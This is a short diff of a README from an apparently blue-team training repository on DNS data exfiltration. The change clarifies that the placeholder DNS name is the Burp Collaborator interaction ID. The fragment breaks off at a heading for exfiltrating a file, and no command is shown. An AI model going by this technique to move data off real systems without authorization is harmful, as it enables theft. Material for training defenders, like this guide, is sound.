sans-blue-team/DNS-Exfiltrate/README.md

 Note that you will receive more reliable results by specifying the name server via `dig @`...

-In the examples below: `<DNS Name>` is the random name provided by Burp Collaborator.
+In the examples below: `<DNS Name>` is the random name provided by Burp Collaborator (AKA, the interaction ID).
 For example: use `q3uv485lz802ad6a7xz6c2izvq1hp6` if your Beef Collaborator address is `q3uv485lz802ad6a7xz6c2izvq1hp6.oastify.com`.

 ### Exfiltrate a file: